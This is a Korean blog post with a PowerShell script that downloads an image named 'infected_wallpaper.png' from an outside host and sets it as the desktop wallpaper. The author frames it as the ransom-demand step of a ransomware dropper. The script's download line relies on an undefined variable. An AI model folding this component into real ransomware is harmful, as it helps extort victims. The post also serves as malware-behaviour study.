-
[Windows] Powershell 배경화면 바꾸기 본문
# setting wallpaper function
function Set-WallPaper {
param (
[parameter(Mandatory=$True)]
# Provide path to image
[string]$Image,
# Provide wallpaper style that you would like applied
[parameter(Mandatory=$False)]
[ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
[string]$Style
)
$WallpaperStyle = Switch ($Style) {
"Fill" {"10"}
"Fit" {"6"}
"Stretch" {"2"}
"Tile" {"0"}
"Center" {"0"}
"Span" {"22"}
}
If($Style -eq "Tile") {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
}
Else {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
}
$temp =
@"
using System;
using System.Runtime.InteropServices;
public class Params
{
[DllImport("User32.dll",CharSet=CharSet.Unicode)]
public static extern int SystemParametersInfo (Int32 uAction,
Int32 uParam,
String lpvParam,
Int32 fuWinIni);
}
"@
Add-Type -TypeDefinition $temp
$SPI_SETDESKWALLPAPER = 0x0014
$UpdateIniFile = 0x01
$SendChangeEvent = 0x02
$fWinIni = $UpdateIniFile -bor $SendChangeEvent
$ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
}
# download wallpaper
$downloadURL = "http://bpsec.co.kr/~minibeef/download/infected_wallpaper.png"
$path = ($env:TEMP) + "\infected_wallpaper.png"
$client.DownloadFile($downloadURL, $path)
# setting wallpaper
Set-WallPaper -Image $env:TEMP"\infected_wallpaper.png" -Style Fit
랜섬웨어가 악성행위 후 wallpaper를 변경하여 피해자에게 금액을 요구하는 시나리오를 가정, dropper를 실행했을 때 감염 행동과 동시에 wallpaper가 적용되도록 만들어봤다.
'Workspace' 카테고리의 다른 글
[Powershell] Invoke-WebRequest로 세션 획득 후 Response (0) | 2020.09.02 |
---|---|
[Windows] Powershell FTP (0) | 2020.08.28 |
[Windows] Powershell 백그라운드 실행 (0) | 2020.08.20 |
[악성코드] Windows Malware Persistence (0) | 2020.08.13 |
[Windows] C 프로그램 백그라운드 실행 (0) | 2020.08.13 |
Comments